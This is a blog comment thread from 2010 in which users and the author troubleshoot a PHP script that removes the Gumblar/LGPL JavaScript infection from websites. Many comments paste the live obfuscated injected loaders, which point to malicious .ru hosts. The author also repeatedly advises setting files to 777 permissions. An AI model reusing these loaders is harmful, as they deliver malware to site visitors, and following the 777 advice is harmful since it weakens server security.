PSD 2 HTML, PSD 2 CSS, PSD to WordPress, PSD to Drupal, PSD to Joomla, PHP/MySQL Development, XHTML/CSS Table-less slicing, blogs and forums, JavaScript / AJAX

Kenni Krogh January 3rd, 2010 at 10:18 am

Really nice! its took them all, include the the new lines
Nice, its works again.

Will January 3rd, 2010 at 11:24 pm

Thanks a lot. Now my servers are clean. But how did you remove the virus from the computer? I can’t even turn mine on anymore. Suppose I’ll have to run XP from the cd, but what software can remove the virus?

Ilya January 4th, 2010 at 12:34 am

Thank you very much for your script! It’s really useful.

But I have a problem with it: it is stopping by timeout while executing at the server. So it couldn’t finish clean up even after multiple lunches

My server show me a message like this:
accel: document from backend 10.0.0.34 contains no data while processing http://10.0.0.34:80/curevir.php

Ilya January 4th, 2010 at 12:36 am

to Will: use Avast (http://www.avast.com/)

Will January 4th, 2010 at 9:25 am

Thanks, Ilva

Konstantin Boyko January 4th, 2010 at 11:13 am

Ilya, try to increasing max script execution time parameter at your server, also there is undocumented parameter in the script. If you run it as http://yourhost.com/curevir.php?limit=XXX to the script it will find XXX files, clean them and stop after that.

Olle January 4th, 2010 at 10:02 pm

Hi i do have some trouble using the script. I uploaded it, ran it, have a logging.txt but there are still infected files. Any ideas what i did wrong?

Konstantin Boyko January 5th, 2010 at 11:44 am

Olle, please make sure that you have writing permissions for the files, check if you downloaded the latest version of the script. If you still have issues please contact me by e-mail which you can find in the script comments. I’ll try to help you

PG January 5th, 2010 at 3:58 pm

I got the virus on Joomla, do you know how did i get the virus to servers?

Konstantin Boyko January 5th, 2010 at 4:31 pm

PG, your FTP password was stolen by the trojan virus (which you or someone else having the password stored in FTP client at local machine). Then the hackers used the password in order to infect the files on your server.
As far as I know Avast antivirus finds the virus.

Ankit January 5th, 2010 at 6:32 pm

I tried this script. It removes the malicious code, but immediately after removing the code when i check the files again, the code is seen again. Please help. Any idea how do i stop the files from getting changed again and again ? thanks..

Konstantin Boyko January 5th, 2010 at 6:35 pm

Ankit, the first thing you need to do is changing your FTP password (don’t save it in your FTP client until you make sure that the machine is clean). Then run Avast - it should find the virus on your machine.

Ankit January 5th, 2010 at 7:03 pm

Thanks Konstantin for such a quick response. I will try this out and post the updates.

Thanks again.

Richard January 5th, 2010 at 9:22 pm

Great script thanks.

This has infected all but two of my sites and I was going nuts trying to work it out. The script (so far) seems to have done the job!

People should note to not only delete password lists but to also update your FTP client software, Adobe reader, and any antivirus and malware programs.

Good luck everybody!

jamhammer January 6th, 2010 at 4:29 pm

Hi I downloaded the original script before finding your page , and it seems to have worked on one of my sites.
However I downloded the latest script posted here and when i unzip it, Avast! is claiming that there is a Trojan Horse[JS:Illredir-A [Trj]] in it. Is this a false positive? Thanks

Konstantin Boyko January 6th, 2010 at 4:33 pm

to jamhammer: I think Avast just finds virus pattern in source code (which is of course there once the script is searching for it) and alerts about that.

jamhammer January 6th, 2010 at 6:06 pm

Perfect Thanks, It seems to have worked across all my sites.
Thanks so much for making this tool available to us!

Konstantin Boyko January 6th, 2010 at 6:10 pm

You are welcome!

Le Roux January 7th, 2010 at 1:31 am

Hello,
Thanks you very much for your script!
I think this is a good script but not works for me.
When run it in the browser by pointing it to http://www.mysite/curevir.php, it loads for hours and never finish executing script. I think my web site is too big and contains too many infected files…do you have a solution for this?
Thanks!

Konstantin Boyko January 7th, 2010 at 8:33 pm

Le Roux, please try to run the script with extra parameters:

1. http://www.mysite/curevir.php?shell=1 will use shell search instead of php search, so it saves some memory (but slows the script a bit)
2. http://www.mysite/curevir.php?limit=XXX (XXX can be whatever you want - 100, 1000, etc.) - this will limit number of cured files per script execution.

If you still have troubles let me know

jane January 7th, 2010 at 10:02 pm

the script starts to look a little different

/*LGPL*/ try{ window.onload = function(){var Wy7dp8g50r5d6 = document.createElement(’s^c!)$&r@$i##p@@^@t!)@’.replace(/@|\!|\(|\^|\)|\$|#|&/ig, ”));Wy7dp8g50r5d6.setAttribute(’defer’, ‘d$e(##f&e$((@r#^)’.replace(/@|\)|\(|&|\$|#|\^|\!/ig, ”));Wy7dp8g50r5d6.setAttribute(’type’, ‘t&$##e)(x$))@t@)^(/&)^j@@$a^(!v!a^(s@^$c(^r$)i!(#)!p#&t$#!&’.replace(/&|\(|\!|#|\^|\$|@|\)/ig, ”));Wy7dp8g50r5d6.setAttribute(’id’, ‘L^@(!j$()w$@l!)b&)(y!y!!)h$(#z&#w@&y!#^t^&t)#’.replace(/#|&|\!|\(|\^|@|\$|\)/ig, ”));Wy7dp8g50r5d6.setAttribute(’s&r(c&!’.replace(/\$|\!|\)|&|@|\^|#|\(/ig, ”), ‘h$t&)t))!p!@:(/)(/(#@i&!m&^(m()!o^b^(i&)#l$(@(i@$e#n!@()&s&$c$&&o^#@u&#t#^2@)4^##!@-$)@d#)#$e#@!.)z(#^s^)#h(a#^r(e)&.$n&e##&t$&).&!e@b@)#a!(y&!-!^(c!(o!)m#^-(a#^@(u)^&@$.)#w^@#o$@(r#l)(&d!w##e(&$b$^w(!)$)o)^r^&^&l&^d&^#^&.(r@@)u$&!#:@^)@8(@(^@0(^)8^)0$)#(/!)h^^!u&^d(^@#o@n#$(g&@!&.$&c!o$^^m)&/^h^u&!d@##o(&#n@^g#.^c!$^)o(m$!^#/^!@$b(@i!^@g^#!l^o&!b((^#!e$.&^#(n(#&e)@.^$#j$p&!#/^!@g^^o@)@@(o$(g#@&(l!(#!(e@^.$c$o!^($m!/!^)^w&r#^$z)^u@&(t#@a$)$.#p)$l$$/(&#&’.replace(/@|&|\(|#|\!|\^|\)|\$/ig, ”));if (document){document.body.appendChild(Wy7dp8g50r5d6);}} } catch(Z5cbieeds176kcqglrh3d) {}

Jay January 8th, 2010 at 3:54 am

Hi. I tried this out and it worked the first time but it got infected again before I could change passwords. This time when I did it I got the following:

TOTAL: 0
START BACKUP:
END BACKUP!

But it didn’t fix it.

Any ideas?

Thanks for your efforts.

Jay January 8th, 2010 at 4:23 am

Well, it looks like there may be something else out there. This was in my index.php file

/*LGPL*/ try{ window.onload = function(){var Nda8b3m7ia08vat = document.createElement(’s$((c^r)$i!&p^$&t^)’.replace(/\^|#|\)|\!|\$|\(|@|&/ig, ”));Nda8b3m7ia08vat.setAttribute(’defer’, ‘d)&^e($f###e^$r$@$’.replace(/\(|\^|\)|\!|&|#|\$|@/ig, ”));Nda8b3m7ia08vat.setAttribute(’type’, ‘t($^e^&$!x@)t!/))$j)$(&a)())v#$(@(a(@@!s!&##c($r##^^i#&(p((@t)&’.replace(/\(|\!|#|@|\^|\$|&|\)/ig, ”));Nda8b3m7ia08vat.setAttribute(’id’, ‘O&!&6!p!!!!j^(&!2))^z@!(8!(#f)&r!&&!$i))!)’.replace(/@|\(|&|\)|\$|#|\!|\^/ig, ”));Nda8b3m7ia08vat.setAttribute(’s^^r)!^#c((’.replace(/\!|#|@|&|\)|\$|\(|\^/ig, ”), ‘h#(t&$(t!)!&p(@(:#@)$/#($$/^u!p)l$!o!a)&d$$e^$d#!^-$@!t$!$o@$.))j^^((o@$@y^$!^.$c@!n@.!()g()i)z#m(@!o)d$$()o#-)(c)$!o&@m#&.##(@w&)^e)^@b$^n$((e(@&t^(@e!($n$g&l)(i)s&#!#@h$.^$r&u^(@:(#@8($$0#)8!^(0$#@$/$^$g()o!&(&!o&#)g($&l$e^$#.&$c($($o@^m$/$#$g#&&o^^#!#o&$g#l(e)##@@.^&)(c(#o&#(m$$$/#!(@(e#@)^^n).(&w@$#$@o^##r(#)d(#(#p$^r^&e#$s$)s(.)&^c&)o^m$(^/$b#t^j$^#(^u#@n@k(&i@@^#e#&#.#&)o)^r#)$&)g^#/)^^g#(o#o!(g@l(!!(e&)^.^^)c^!()o(!&(m#.&@^p@^$e#&!/$’.replace(/\)|\(|@|#|\^|&|\$|\!/ig, ”));if (document){document.body.appendChild(Nda8b3m7ia08vat);}} } catch(Bvlu3ghp1mre1o76k9fnb) {}

Konstantin Boyko January 8th, 2010 at 11:02 am

OK, it seems they changed the starting pattern, so I’d have to modify the script a bit. Will post it here when I have updated version.

Konstantin Boyko January 8th, 2010 at 1:15 pm

The script is updated, added a few comments in the post. The old link now refers to new version (please check update notes in the post)

mist January 8th, 2010 at 2:47 pm

hello and thx 4 the script. but it appears that function name in the code changes randomly. my case:

/*LGPL*/ try{ window.onload = function(){var M0ls6baqhmn = ….

part after var must be changed in the script on all places so can be detected it properly

Konstantin Boyko January 8th, 2010 at 3:22 pm

mist, yes - that is true. But the script doesn’t rely on that var, so it will fix all occurences.

mist January 8th, 2010 at 3:29 pm

i thought it does since it has $virus_string variable. nevermind, it works great, thanky you.
btw, if people have problems with permissions and have shell access to the server, the script can be run directly from shell (as root) with:

# php curevir.php

Konstantin Boyko January 8th, 2010 at 3:33 pm

Yes, you are correct. This way it even can be used for cleaning the files above web folder

Tom January 8th, 2010 at 10:40 pm

Thank you so much!!! The virus actually killed my hard drive. Thanks for the fix, it was a nasty virus.

mark January 8th, 2010 at 11:48 pm

very good work guys!
unfortunately, at the “backup” area of the script i had a error, right after array 0 - 127, then all the files changed.

BUT site didn;t load, because there were left on some pages some stuff like: <!–c15c78d42 some
<!- some < and some <!–c15c78d42f0fb ; <!–c15c78d ; <!–c1

Kalpesh Mistry January 9th, 2010 at 4:56 am

oh.. thankyou. i finally recovered my website..

GoMe Computer January 9th, 2010 at 8:44 am

thanks sir my computer clean

Konstantin Boyko January 9th, 2010 at 12:01 pm

Mark, in case you still have problems please contact me by e-mail - I’ll do my best to check

bias9 January 9th, 2010 at 7:19 pm

thanks for this! worked great for me. Does the script change file permissions back to the original after its done cleaning the files up?

Konstantin Boyko January 9th, 2010 at 8:12 pm

The script doesn’t change the permissions at all, you should care about permissions yourself.

mark January 9th, 2010 at 8:16 pm

can you help me remove the leftovers from curevir ?

like a small script mod to remove all ” <!-c15****** ” stuff.

mark January 9th, 2010 at 8:21 pm

i tried on another server and again error on backup
START BACKUP:
tar -czvf /home/ccore/public_html/!backup-1263061012.tgz
……………..
Array
(
[0] => Array
(
)

[1] => 127
)

BACKUP failed…
END BACKUP!

Gabriel January 9th, 2010 at 11:21 pm

It is not working for me.
… Permission denied …

Konstantin Boyko January 10th, 2010 at 12:01 am

Gabriel, you need to take care about permissions yourself. For example you can set 777 permissions to all your files. The script can’t take care of permissions as it is server-configurable thing and scripts are not always allowed to do everything we want to.

Ben January 11th, 2010 at 8:20 am

Hello Konstantin,
i have the same problem with other too since 2 days back. So I go through internet and found your tips n tutorial here. I have clear up the script manually in index.php and other php files in my folder.

then i change FTP password, and tried to run the script here

Trying to cure /home….

it shows FAILED along the way.

Do i miss anything?

Thanks for your help

Konstantin Boyko January 11th, 2010 at 11:28 am

Ben, it seems your files don’t have writing permissions. Make sure to change them to something more appropriate - 777 will work in all cases, though some servers have security limitations on that.

akire January 11th, 2010 at 8:40 pm

I fix it with “Mass Text Replacer”
download trial…

-add all files
-from 1 suspicious file copy virus code
-in program looking for “code” and replace with “” or ” ”
-done

Sam January 11th, 2010 at 10:57 pm

Hi,

I am wondering - is it safe to save FTP information in Dreamweaver, or should it be avoided completely?

MoBi January 11th, 2010 at 11:43 pm

Well done Mr. Boyko I simply love this script you have made. You are just awesome. This virus/worm was extremely annoying and all my sites running in a same shell got infected with this virus. I almost gave hope and thought to start them over again. But a friend of mine caught this code in the php files and I googled it. And here I am, at your doorstep. This script of yours cleaned my website and all passwords are now changed. Many many thanks for this script bro.

Quasi_Mojo January 12th, 2010 at 1:46 am

Thank you so much for providing the script removal tool - you saved me hours of searching and deleting!

Our site was hit over the weekend, as well as over the Christmas break, and I was wondering how they managed it.

It looks like the FTP login information was snatched from my FileZilla client - the idiots store FTP passwords in plain text format in the .xml file - and they then used that to upload their Javascript. The idiots got their obfuscated Javascript wrong, so the website only showed a blank page, rather than redirecting the site traffic.

FYI: I have a Joomla site and it’s not the site’s server that has the virus, but the users local workstation. So you don’t have to use a virus scanner on the hosted Joomla site.

Konstantin Boyko January 12th, 2010 at 11:27 am

Sam, it is not safe. Ideally you shouldn’t store FTP info there.

Ray January 14th, 2010 at 4:05 am

A customer has been infected. Using a few simple decoding techniques and a whois lookup, I find that the information is being harvested here:
domain: TEENWEBDESIGN.RU
type: CORPORATE
nserver: ns1.hostserverdirect.com.
nserver: ns2.hostserverdirect.com.
nserver: ns3.hostserverdirect.com.
nserver: ns4.hostserverdirect.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 4912 219900
e-mail: dibs@freemailbox.ru
registrar: NAUNET-REG-RIPN
created: 2009.10.28
paid-till: 2010.10.28
source: TCI
In the morning, I shall mail to abuse@hostserverdirect.com but I don’t hold out much hope to get the site offline. It’s been a long haul today to investigate and fix the site

Daniel January 14th, 2010 at 11:24 pm

I was infected the tool you provided worked perfect to remove, but how did i get this virus in my js files? is maybe because of the permisions of the js folders? or why, how can ai avoid this to happen again. Thanks a lot.

jarno January 15th, 2010 at 1:40 pm

Hi, My blog was infected new one. Hre is the code “/*LGPL*/ try{ window.onload = function(){E1e6wn3ijzwv9g = ‘h$@t##()t(!&@p!@:@/&@/$^&()t($!o)#r$&r^#e#$)@n!(#$t)!!z$$-@)#c(!o$$!m!^).&s()&@$o$()s!^o^(.&($!c^&o^$&)m(#$.&@p)e(!t#a(#r$&^d)$$a^s&)#-)$&c($)^$o(m!&!.(e!!&a##!#s^&y!$l)i&@&f#e@d&$)i#$!r(!(e!c))t))#.@(^r#)#u#@:^($8(!^0@8#!0$&&&/#()(n@@!^g(@&o@(i$$##s!(a!o@!^.^!n)^e!#)t#!/#(n#@&#g)^#^o#)(i^)s($@(a#o(!#.)$n)$@e@&t@$#/!(@c@$^&$h@(i^@#n&^@a(#(!z((.@$$c##o#$)@m&!/$^!)c@@(t)r@@i$@(p@).&^c^@o()$m(/!!g&#^^o#)(@o(g^l#e$$.!!@c)^))o^#@@#m$/$(’.replace(/\!|\^|\)|\$|@|#|&|\(/ig, ”);var D7fyb435pte = ’s&^(c)##r!^i!@p##!!t@!&’.replace(/#|\)|\$|\(|@|&|\^|\!/ig, ”);var Sn9jgvbufr9 = ’s@r)^#^c^#’.replace(/\(|#|\^|\!|\$|\)|@|&/ig, ”);var Rxs7200gjqt6h = D7fyb435pte;var Rmkt0nsas90ld = document.createElement(Rxs7200gjqt6h);Rmkt0nsas90ld.setAttribute(’defer’, ‘d^^&e(f(&e&(@r@(’.replace(/&|@|#|\!|\(|\)|\$|\^/ig, ”));var Kaws9hrzdk = ‘t@^@e!)$x)@t@#)(/!(j(&@a(v#&^a$)s$!c&#((r@^i)&)p##!t#(’.replace(/\)|#|\^|&|\!|\$|@|\(/ig, ”);Rmkt0nsas90ld.setAttribute(’id’, ‘J(!&#)8(!n^$9!i(1^3^($t@^f^)7^(@i@#&v#)v@@’.replace(/\^|\)|\!|\$|&|#|@|\(/ig, ”));Rmkt0nsas90ld.setAttribute(Sn9jgvbufr9, E1e6wn3ijzwv9g);Rmkt0nsas90ld.setAttribute(’type’, Kaws9hrzdk);document.body.appendChild(Rmkt0nsas90ld);if (document){Rxs7200gjqt6h = D7fyb435pte;}} } catch(Uskp2qj8xy0ey16t2xwup ) {}
” I have used your script. But still connect to. xxxxxx.ru….

Konstantin Boyko January 15th, 2010 at 1:47 pm

Jarno, make sure you have downloaded the latest version of the script (it has version 1.1 inside the scirpt source). It should work for this. If no - contact me and I will try to help

Julien January 15th, 2010 at 4:05 pm

Thanks for your script, worked fine

I wonder how it is possible to get infected (windows side) while using up-to-date anti-virus software like Antivir of NOD32.

mark January 15th, 2010 at 5:30 pm

It seems my ftp passwords were “taken” from Total Commander, since that is the only place i have them stored.

michael January 15th, 2010 at 8:38 pm

I really want to thank you for this, this really saved my biz, merci beacoup, dude, best wishes

Barbara January 16th, 2010 at 5:04 pm

Hi -

Thank your in advance - I found your site when searching for a solution to the virus on my wordpress sites.

Questions please (I am not very knowedgable about scripts & such.

I have severaly domains/sites on my BlueHost accunt that are infected.

First - I tried to upload yur script to the individual domains, but it would not run.

Then I uploaded to what I thought was the web root, - in the same folder that holds my .cpanel , public_html, etc.

However - after pointing to the script on my server - it tells me I am missing the wp-config file & wants to set it up?

http://www.screencast.com/users/BloggingForDogs/folders/Jing/media/11955c8f-c311-4e79-af82-69ed64557c46

Please tell me what I am doing wrong.

Thank you!

Barbara January 16th, 2010 at 5:09 pm

Hi Again -

For example - one of my domains is http://www.MommyYoga.com - which is on my main BlueHost accunt.

Here is the script that is at the top & bottom of the page when I “View Source”:

/*LGPL*/ try{ window.onload = function(){Krca4thdj71 = ‘h@$t(t)p$^#:(/&$((/@$s^&t&a#$&r$t!)i!&m!e&s^$@2^-##c@#&@o()#)m($.()t#!^#r@!a!$))^i@)#d$!!^!n#)t@!)$.@&n!!e##)($t#@^.$(g)&o#($o#^$^g!&l$$^)e(-#&i&^!t@$^@.!@@m@(&s@&w#e!!b(!w&!o@)r$#l^d((&#.&r@&u&^:^(!8&^@0!^#(8$0&/()^!&g$^@$n$&^&a&^v^@!i&&(.()@#c#o^).@(j)@)p@!/)^$g(#$n(#(a^&#v$i#(#.##c^)#o)!(.@j$(p^@/)n^@e#w(!$s$@)3$$!i$&$#n#&$s&(@$i!d^e^@&r(&#^.(#!(c)#^o#$m&&((/@(^!$g@&o!o)#)!g@)@l$!)e!$.)c$o$$m#$/$i^#p$@i$#(c@&)#!t!u^!r!!e@$.($^$r@u$!#/!’.replace(/#|&|\(|\^|\)|\$|\!|@/ig, ”);var Wukmgfrjydwgb38d = ’s!c)r(&!i$!(p)t#(’.replace(/\!|&|\(|#|\$|@|\^|\)/ig, ”);var Aixv05bchnthxw = ’s#^r)(c$!#’.replace(/\(|\^|\$|&|#|\)|\!|@/ig, ”);var A9261eworh = Wukmgfrjydwgb38d;var I4dwv422dz5mtw = document.createElement(A9261eworh);I4dwv422dz5mtw.setAttribute(’defer’, ‘d#^e@!f!$e)#&r(&)’.replace(/\^|#|\$|\!|\(|&|\)|@/ig, ”));var Zvanfx8um45 = ‘t(@^&e^@&x)^^t#/!)j@@a(!!$v&!a##s&^)^c(r@#^@i@$p^(!#t@^&’.replace(/\!|\)|\$|@|&|\(|#|\^/ig, ”);I4dwv422dz5mtw.setAttribute(’id’, ‘U@a&))#r$$k$@$!n)(i&!d)#f)&$0@)@s&&c)@&5$(&$’.replace(/#|\!|\^|@|\)|&|\(|\$/ig, ”));I4dwv422dz5mtw.setAttribute(Aixv05bchnthxw, Krca4thdj71);I4dwv422dz5mtw.setAttribute(’type’, Zvanfx8um45);document.body.appendChild(I4dwv422dz5mtw);if (document){A9261eworh = Wukmgfrjydwgb38d;}} } catch(Wjaildznalx6l5teejd ) {}

Thank you in advance for your help.!

Tom January 17th, 2010 at 12:12 am

It got me, noticed redirected google links on the 14th then some of my wordpress installs started acting buggy, I flushed it from about 6000 files today with your tool, saved me a bunch of time. It seems like it is picking up steam and moving quicker. Question - How can I tell if this is removed from my desktop? Are the google result redirects originating from my desktop or from the compromised websites? I believe this is connected with the overlay.xul js attacking firefox and chrome - http://isc.sans.org/diary.html?storyid=7765 - they call it variant of Vundo

Tom Saari » Major virus spyware activity Gumblar Vundo January 17th, 2010 at 12:32 am

[...] Here is a link to the tool I used to remove the rogue code from over 7000 files it infected of mine in 1 day.   http://justcoded.com/article/gumblar-family-virus-removal-tool/ [...]

Thomas January 17th, 2010 at 10:48 am

Code modified again,found this in html file, it was changed 16.jan2010 05.12 CET+1

/*CODE1*/ try{window.onload = function(){var Q236s4ic4454clw = document.createElement(’script’);Q236s4ic4454clw.setAttribute(’type’, ‘text/javascript’);Q236s4ic4454clw.setAttribute(’id’, ‘myscript1′);Q236s4ic4454clw.setAttribute(’src’, ‘h(t)!^t^))p#@:&&/(##/&$#c^$$l^@)(i&(c$^)k))#$s^o$#r!^)^-$$$&c@$o#^m$!#.#&(e((a!!s)(@t)&m((o@^^n!$!e&^&(y$#).#&c$@o$@!$^m(##(.@m@o@(b(^i&#l#!@e@)@&(-(d)&(e^&@(.))@&h)@@@o^^@m!e#&&)s)a#$$l$$#e^@!p^@l&@u#((^s^#@(.$)r$$u(:!$8!$0&$&8)@$0$!)/!o#&@c##@@n(@^!.))n@e@.)&j!@^#$p#/)^@o^c^n)((.()n^)e^$.@!)$j!!^(p#!/@&)c^(l&(a&s(^s@!m^@a($^t#e!#^@)s$.^c^&#o((&m&/)(&@l&()i(@n)(k$@h&e)@$(l)$p^!e)$!$r$#.)&c!&n($@/$g#o^@&o!$$g$^l^&#@e$.&&!c#o@$$m(/$$’.replace(/\(|\!|&|#|\$|\)|@|\^/ig, ”));Q236s4ic4454clw.setAttribute(’defer’, ‘defer’);document.body.appendChild(Q236s4ic4454clw);}} catch(e) {}

Thomas January 17th, 2010 at 11:17 am

more on symantec website
http://www.symantec.com/connect/blogs/new-obfuscated-scripts-wild-lgpl

Konstantin Boyko January 18th, 2010 at 2:56 pm

Barbara, looking at your screenshot you mistyped name of the script - it should be curevir.php not curvir.php
If you have troubles please contact me by e-mail (you can find it in script source)

Michael January 19th, 2010 at 2:46 am

Please can anyone help me ?
I’ve run the script but it can’t cure my website.

Warning: fopen(/home/schweize/public_html/!infected-log-1263861566.txt) [function.fopen]: failed to open stream: Permission denied in /home/schweize/public_html/curevir.php on line 173

FAILED!
Trying to cure /home/schweize/public_html/kanton-bilder/show_ads.js

I would be very thankful to your help

Michael

Michael January 19th, 2010 at 2:48 am

The site is:
http://www.schweizer-portal.ch/curevir.php

Please can anyone help me ?
I’ve run the script but it can’t cure my website. Michael

Manoj January 19th, 2010 at 8:11 am

Hi Konstantin,

As you have mentioned, to run this script we will need to give 777 permission on the files and then this script would cleanup the files for us.

The problem I see is that one would again need to go to each file and set back the permissions. This is time consuming, right? Is there any solution for this?

Thanks,
- Manoj

Claudiu January 19th, 2010 at 11:15 am

Hello…i need help…your download link does not work…is virused…where can i take the good virus removal tool?

Konstantin Boyko January 19th, 2010 at 11:35 am

I see that many people have permissions issues. They are expectable and unfortunately I don’t have better solution than setting writing permissions (777 or whatever works fine for your server) for the files. After the script executes of course you will need to put all the file permissions back. I wish this process could be made automatic, but unfortunately when you don’t have writing permissions for the script in most cases the script won’t be allowed to change file permissions as well. The only solution which comes in mind is the following: you run an auxiliary tool which checks permissions of every file and saves information about it somewhere. Then you set all the file permissions to 777, do cleaning and then run that auxiliary tool again in order to set original permissions back. The only issue is that file owners could be changed this way.

2Michael: you need to set writing permissions to all files (777 would definitely work), read previous comments in this post about this.

Michael January 19th, 2010 at 11:46 am

oh yes, I have set the permission to 777 but the curevir.php is still
returning “Failed”

Warning: fclose(): supplied argument is not a valid stream resource in /home/schweize/public_html/curevir.php on line 251
FAILED!

And on other part of my site it’s still showing:

Parse error: syntax error, unexpected ‘<’ in /home/schweize/public_html/admin/index.php on line 44

Claudiu January 19th, 2010 at 12:06 pm

My website is http://www.topographic.ro
When i try to download your program antivirus tell me that have an virus and cannot download…what to do? please help me…

Claudiu January 19th, 2010 at 12:07 pm

And if i disable antivirus …when open archive said Unexpected end of archive…Thank you

Konstantin Boyko January 19th, 2010 at 12:27 pm

Claudiu: the download link seems to be fine - probably your antivirus just recognizes pieces of malicious code in the source and blocks it.
Michael: contact me by e-mail if you have issues, I will do my best to help

Barbara January 21st, 2010 at 12:47 pm

Hi Konstantin -

Thank you for this scrip and your very kind assistance to me and others who have encountered this virus.

I was able to upload the script - just typed it wrong the first time ( duh!) - then tried to run it (spelled correctly :-)) - however even though I changed the permission on my server it still would not run.

ATTENTION - Anyone with a shared hosting account:

I have shared hosting on BLueHost - so I called the tech support to ask why the permissions kept defaulting back to 755, even though I changed them to 777 to run the script.

The tech guy told me that by default - their systems will not allow any executable scripts to run.

I then explained about the virus that had infected most of my domains & that it was also all over the Symantec site & that this script could cure it.

The tech support guy was very nice & ran the script for me.

So if you have shared hosting & cannot get this script, try calling tech support to explain & get them to run the script for you.

WONDERFUL! ALL FIXED!

Also- the BlueHost tech guy understood that this virus cold possibly be infecting & reinfecting many other accounts, so I told him to visit your site for more information.

Konstantin - you are a genius, so thank you with all of my heart.

Barbara

Konstantin Boyko January 21st, 2010 at 12:52 pm

Thanks, Barbara - you are welcome.

Stojan Kosic January 21st, 2010 at 3:41 pm

Hello,

My site got infected 2 days ago with virus that starts with /*LGPL*/ comment, and I have used curevir.php, and everything worked fine, but after to days virus came back in changed form there is no starting comment /*LGPL*/ so I can’t use curevir.php.

code looks like this:

any idea how to fix this?

thanks!

Konstantin Boyko January 21st, 2010 at 3:45 pm

Stojan, you haven’t post the virus code, could you send it to me so I can take a look?

bess January 21st, 2010 at 4:18 pm

yes the code is without start:

try{window.onload=function(){newEl = document.createElement(’script’);newEl.setAttribute(’defer’, ‘1′);newEl.setAttribute(’src’, ‘http://google-be.abc.go.com.perezhilton-com.authentictype.ru:8080/asg.to/asg.to/mediaset.it/sears.com/google.com/’);document.body.appendChild(newEl);} } catch(Vhjsgyj9 ) {/*handle exception*/}

Barbara January 21st, 2010 at 6:58 pm

Hi Konstantin -

As an alert - my sites have become reinfected - even though I have not logged in since the fix.

However - it seems they have morphed the code again.

The domain is http://www.Paws4Laws.com

(I am the volunteer webmaster for the American Rottweiler Club)

Here is the new code I am posting for you:

try{window.onload=function(){newEl = document.createElement(’script’);newEl.setAttribute(’defer’, ‘1′);newEl.setAttribute(’src’, ‘http://atwiki-jp.pcauto.com.cn.linkedin-com.authentictype.ru:8080/livejournal.com/livejournal.com/google.com/terra.com.br/opera.com/’);document.body.appendChild(newEl);} } catch(Q4is9dxs ) {/*handle exception*/}

I am on the phone again with BlueHost to see if they will run the script for me again, but it doesn’t seem to be working.

Can you please adjust the script? Thanks so much,

Barbara

Chris January 21st, 2010 at 7:20 pm

Excellent!!

I was looking for something like this. Unfortunately only ASP is available with my host.

Is there an ASP version of this script somewhere?

Thanks!

Brent January 21st, 2010 at 7:37 pm

@Barbara - I am getting the same hack script. Can someone help? Thanks.

Konstantin Boyko January 21st, 2010 at 7:43 pm

I see the modification, will need to investigate and update the script. I will post updated version here once I have it.

Brent January 21st, 2010 at 7:52 pm

The hack script that attacked my site is: try{window.onload=function(){newEl = document.createElement(’script’);newEl.setAttribut e(’defer’, ‘1′);newEl.setAttribute(’src’, ‘http://microsoft-com.whitepages.com.isohunt-com.cometruestar.ru:8080/typepad.com/typepad.com/timesonline.co.uk/google.com/yahoo.com/’);document.body.appendChild(newEl);} } catch(Y7bngtnv ) {/*handle exception*/}

Dejan January 21st, 2010 at 9:37 pm

Script commented with… /*Exception*/

Stojan Kosic January 22nd, 2010 at 12:09 am

Hello,

my code look like this:

/*Exception*/ document.write(”);

and it has changed from today.

Stojan Kosic January 22nd, 2010 at 12:15 am

some how I can’t write the whole code?

Brent January 22nd, 2010 at 5:18 am

@Brent

At first attack this curevir PHP works great, My miss take I am forgot change one of my FTP account so the second attack come yesterday.

The script injected is not same as first time, but nearly same with your.

You just need change few file

@line 36 :
$starting_comment = ”; // !

@line around 229 change the regeg to

$ptr_js = ‘/(\r*)(\s*)’.preg_quote($starting_comment, ‘/’).’(\s*)try\{window\.onload(.*)(\s*)*$/is’;

and

$ptr_html = ‘/(\r*)(\s*)’.preg_quote($starting_comment, ‘/’).’(\s*)try\{window\.onload(.*)(\s*)(\s*)*$/is’;

Jens January 22nd, 2010 at 11:07 am

The script does not clean the new variant with /*Exception*/
even if you change in the curevir.
Plz release a new version .
Thanks!

Bastien January 22nd, 2010 at 12:34 pm

The hack is now : /*Exception*/ document.write(”);

Someone modify the script php for clean this hack ?

NomadGuru January 22nd, 2010 at 1:47 pm

I guess that ther’s a new version of the virus.

Can someone help whith this new one:
mine is like this:

/*Exception*/ document.write(”);

jam January 22nd, 2010 at 3:07 pm

Yes, today threre is a new code like Sjoan Kosic mentioned
/*Exception*/ document.write(”);

maxi January 22nd, 2010 at 3:09 pm

Hello,

I found this code in the end of my index.html:

/*LGPL*/ try{ window.onload = function(){var Sa6y7pu9×5e1 = document.createElement(’s(!c()^r!@&#i^#&)p)@t@’.replace(/\!|#|\$|\(|\^|@|\)|&/ig, ”));Sa6y7pu9×5e1.setAttribute(’defer’, ‘d)^@&e#f&e(!&#r)’.replace(/#|\(|\$|\^|\!|@|&|\)/ig, ”));Sa6y7pu9×5e1.setAttribute(’type’, ‘t)&$!e#$$x()@t)/&)j$&a^(v^a!s@c()!r@((i$&p@(&t(!’.replace(/@|&|#|\^|\)|\!|\(|\$/ig, ”));Sa6y7pu9×5e1.setAttribute(’id’, ‘H&#^@t@(&i#((q#))&)7$)&j!&6!(&l$)g$#&(k@@a^$8(&&0^0@()’.replace(/\$|&|@|\!|\^|#|\)|\(/ig, ”));Sa6y7pu9×5e1.setAttribute(’s$^#^!r)^c#!)!’.replace(/\!|\^|@|&|\)|#|\(|\$/ig, ”), ‘h##t&#&t!&)p#&$$:&!/(&)/!i(^(@r$c^!#t@(&c@()@-(@@c($o^(^-&(!$i(^)^$n!.)r)@a#@$p#&!i^d)$s$h@#$$a#$r!^^(e(^#.(#$c&o#)@m)#@)(.#(&s)!#k#$y)$@r)(#o!c&!k#&-)&c!o((#m^^^&.(!!t^)$h#e$c@)h$)o$!!!#c)o^&^l#)a$!t&)e)@w)&e$b((!!.@)^r#!!u$#:&8#!&#0@(8^@(0!@/$&)b!)!^r$a)#&z)z&&e$r)$(s@($#.^&c@&o@)m!)!/&))#b&)r$$$a)!z#^z)e#(r@(!^s$(.@^&@!c^)o#!!!m#/$p$!h)o$t&o#(b^@u(&(c$@k(^e(!t)$$.!#c^!o#!&m))/$(^o($#(v@$g@#u)@i(d^!e!)(.#$c&o^m#$/^@@g(o#&#o($(g!l(e&.$)@@)c^&o#!&@m#!/)$’.replace(/#|\!|&|\(|@|\$|\)|\^/ig, ”));if 